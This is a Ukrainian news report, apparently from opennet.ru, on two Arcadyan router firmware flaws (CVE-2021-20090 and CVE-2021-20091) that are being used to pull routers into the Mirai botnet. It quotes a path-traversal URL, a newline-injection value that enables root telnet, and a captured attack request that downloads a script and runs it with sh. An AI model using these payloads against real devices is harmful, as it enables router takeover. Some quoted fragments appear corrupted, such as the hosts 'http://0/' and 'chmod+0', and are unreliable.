У мережі зафіксовано масову атаку на домашні маршрутизатори, в прошивках яких використовується реалізація http-сервера від компанії Arcadyan. Для отримання керування над пристроями застосовується поєднання двох уразливостей, що дозволяють віддалено виконати довільний код із правами root. Проблема торкається досить великого спектру ADSL-маршрутизаторів від компаній Arcadyan, ASUS і Buffalo, а також пристроїв, що постачаються під брендами Білайн (проблема підтверджена в Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone та інших операторів зв'язку. Зазначається, що проблема є у прошивках Arcadyan вже більше 10 років і за цей час встигла перекочувати як мінімум у 20 моделей пристроїв від 17 різних виробників.
Перша вразливість CVE-2021-20090 дозволяє звернутися до будь-якого скрипту web-інтерфейсу без проходження аутентифікації. Суть уразливість у тому, що у web-інтерфейсі деякі каталоги, через які віддаються картинки, CSS-файли та сценарії JavaScript, доступні без автентифікації. При цьому перевірка каталогів, для яких дозволений доступ без автентифікації, виконується за початковою маскою. Вказівка в шляхах символів "../" для переходу в батьківський каталог блокується прошивкою, але використання комбінації "..%2f" пропускається. Таким чином, є можливість відкриття захищених сторінок при надсиланні запитів, подібних «http://192.168.1.1/images/..%2findex.htm».
Друга вразливість CVE-2021-20091 дозволяє автентифікованому користувачеві внести зміни до системних настройок пристрою через відправлення спеціально оформлених параметрів скрипту apply_abstract.cgi, який не здійснює перевірку наявності символу перекладу рядка у параметрах. Наприклад, атакуючий може при виконанні операції ping вказати в полі з IP-адресою, що перевіряється, значення «192.168.1.2%0AARC_SYS_TelnetdEnable=1» і скрипт при створенні файлу з налаштуваннями /tmp/etc/config/.glbcfg запише в нього рядок «AARC_SYS », яка активує сервер telnetd, що надає необмежений доступ до командної оболонки з правами root. Аналогічно за допомогою установки AARC_SYS можна виконати будь-який код у системі. Перша вразливість дає можливість запустити проблемний скрипт без аутенітификации, звернувшись до нього як "/images/..%1fapply_abstract.cgi".
Для експлуатації вразливостей у атакуючого має бути можливість надсилання запиту на мережевий порт, на якому виконується web-інтерфейс. Судячи з динаміки поширення атаки, багато операторів залишають на своїх пристроях доступ із зовнішньої мережі для спрощення діагностики проблем службою підтримки. При обмеженні доступу до інтерфейсу тільки для внутрішньої мережі атака може бути здійснена із зовнішньої мережі за допомогою техніки DNS rebinding. Вразливості вже активно використовуються для підключення маршрутизаторів до ботнету Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark 3A ARC_SYS_TelnetdEnable=5& %212.192.241.7AARC_SYS_=cd+/tmp; wget+http://0/lolol.sh; curl+-O+http://1/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=212.192.241.72&TMP_Ping_Type=212.192.241.72
Джерело: opennet.ru